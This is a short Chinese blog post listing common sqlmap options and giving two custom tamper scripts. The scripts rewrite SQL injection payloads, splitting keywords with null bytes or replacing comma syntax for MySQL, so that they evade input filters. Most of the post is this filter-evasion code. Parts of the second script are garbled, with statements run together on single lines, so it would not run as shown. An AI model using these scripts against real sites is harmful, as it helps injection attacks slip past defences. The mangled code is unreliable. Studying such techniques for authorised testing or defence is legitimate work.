sqlmap常用参数

0

0x01: flush session

参数是—flush-session

0x02: 显示详细payload

  • -v
  • -vv

0x03: POST注入

参数为-r可以指定一个POST请求包。

0x04: tamper

用法:—tamper=xxx,xxxx

自带

  • apostrophemask
  • commalesslimit
  • commalessmid
  • space2comment

自定义1

还有自己用的一些,模板如下:


#!/usr/bin/env python
 
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
 
__priority__ = PRIORITY.LOWEST
 
def dependencies():
    pass
 
tamper_dic = {'select':'se%00lect','from':'fr%00om','where':'wh%00ere'}
 
 
def tamper(payload, **kwargs):
    payload = payload.lower()
    for key in tamper_dic:
        if key in payload:
            payload = payload.replace(key,tamper_dic[key])
    return payload if payload else payload

自定义tamper_dic,可以绕过一些过滤。

自定义2


#!/usr/bin/env python
 
import re
 
from lib.core.enums import PRIORITY
 
__priority__ = PRIORITY.LOWEST
 
def dependencies():
    pass
 
def tamper(payload, **kwargs):
    """
    Replaces some instances with something whthout comma 
 
    Requirement:
        * MySQL
 
    Tested against:
        * MySQL 5.0
 
 
    >>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
    'ISNULL(NULL)'
 
    >>> tamper('MID(VERSION(), 2, 1)')
    'MID(VERSION() FROM 2 FOR 1)'
 
    >>> tamper('IF(26=26,0,5)')
    'CASE WHEN 26=26 THEN 0 ELSE 5 END'
 
    >>> tamper('IFNULL(NULL,0x20)')
    'CASE WHEN NULL=NULL THEN 0x20 ELSE NULL END'
 
    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """
 
 
    def commalessif(payload):
        if payload and payload.find("IF") > -1:
            while payload.find("IF(") > -1:
                index = payload.find("IF(")
                depth = 1
                comma1, comma2, end = None, None, None
 
                for i in xrange(index + len("IF("), len(payload)):
                    if depth == 1 and payload[i]== ',' and not comma1:
                        comma1 = i
 
                    elif depth == 1 and payload[i]== ',' and comma1:
                        comma2 = i
 
                    elif depth == 1 and payload[i]== ')':
                        end = i
                        break
 
                    elif payload[i]== '(':
                        depth += 1
 
                    elif payload[i]== ')':
                        depth -= 1
 
                if comma1 and comma2 and end:
                    _ = payload[index + len("IF("):comma1]__ = payload[comma1 + 1:comma2]
                    ___ = payload[comma2 + 1:end]
                    newVal = "CASE WHEN %s THEN %s ELSE %s END" % (_, __, ___)
                    payload = payload[:index] + newVal + payload[end + 1:]else:
                    break
 
        return payload
 
    def commalessifnull(payload):
        if payload and payload.find("IFNULL") > -1:
            while payload.find("IFNULL(") > -1:
                index = payload.find("IFNULL(")
                depth = 1
                comma, end = None, None
 
                for i in xrange(index + len("IFNULL("), len(payload)):
                    if depth == 1 and payload[i]== ',':
                        comma = i
 
                    elif depth == 1 and payload[i]== ')':
                        end = i
                        break
 
                    elif payload[i]== '(':
                        depth += 1
 
                    elif payload[i]== ')':
                        depth -= 1
 
                if comma and end:
                    _ = payload[index + len("IFNULL("):comma]__ = payload[comma + 1:end].lstrip()
                    newVal = "CASE WHEN %s=NULL THEN %s ELSE %s END" % (_, __, _)
                    payload = payload[:index] + newVal + payload[end + 1:]else:
                    break
 
        return payload
 
    retVal = payload
 
    if payload:
        retVal = re.sub(r'(?i)TIMESTAMPADD\(\w+,\d+,NULL\)', 'NULL', retVal)
        retVal = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)', 'MID(\g<1> FROM \g<2> FOR \g<3>)', retVal)
        retVal = commalessif(retVal)
        retVal = commalessifnull(retVal)
        retVal = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', 'LIMIT \g<2> OFFSET \g<1>', retVal)
 
    return retVal

这个命名为commalessmysql,可以针对mysql进行comma的转义。

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号